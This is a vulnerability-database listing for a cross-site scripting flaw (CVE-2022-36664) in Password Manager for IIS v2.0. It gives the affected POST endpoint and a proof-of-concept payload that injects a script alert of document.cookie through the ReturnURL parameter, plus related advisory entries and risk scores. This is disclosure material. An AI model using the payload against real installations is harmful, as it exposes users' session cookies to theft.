Password Manager for IIS v2.0 - XSS

🗓️ 25 Mar 2023 00:00:00Reported by VP4TR10TType

exploitdb🔗 www.exploit-db.com👁 133 Views

Password Manager for IIS v2.0 - XSS vulnerability in ReturnURL paramete

Reporter	Title	Published	Views	Family All 14
0day.today	Password Manager For IIS 2.0 Cross Site Scripting Vulneraility	4 Oct 202200:00	–	zdt
0day.today	Password Manager for IIS v2.0 - XSS Vulnerability	27 Mar 202300:00	–	zdt
Circl	CVE-2022-36664	27 Dec 202200:41	–	circl
CNNVD	Adiscon Password Manager 跨站脚本漏洞	3 Oct 202200:00	–	cnnvd
CVE	CVE-2022-36664	26 Dec 202200:00	–	cve
Cvelist	CVE-2022-36664	26 Dec 202200:00	–	cvelist
EUVD	EUVD-2022-39366	3 Oct 202520:07	–	euvd
NVD	CVE-2022-36664	26 Dec 202222:15	–	nvd
OSV	CVE-2022-36664	26 Dec 202222:15	–	osv
Packet Storm	Password Manager For IIS 2.0 Cross Site Scripting	3 Oct 202200:00	–	packetstorm

# Exploit Title: Password Manager for IIS v2.0 - XSS
# Exploit Author: VP4TR10T
# Vendor Homepage: http://passwordmanager.adiscon.com/en/manual/
# Software Link: http://passwordmanager.adiscon.com/
<http://passwordmanager.adiscon.com/>
# Version: *Version 2.0
# Tested on: WINDOWS
# CVE : CVE-2022-36664


Affected URI (when changing user password):
POST /isapi/PasswordManager.dll HTTP/1.1

Affected Parameter in http
payload:*ReturnURL*=<script>alert(document.cookie)</script>

*Cordially,*

25 Mar 2023 00:00Current

6.3Medium risk

Vulners AI Score6.3

CVSS 3.16.1

EPSS0.02877

SSVC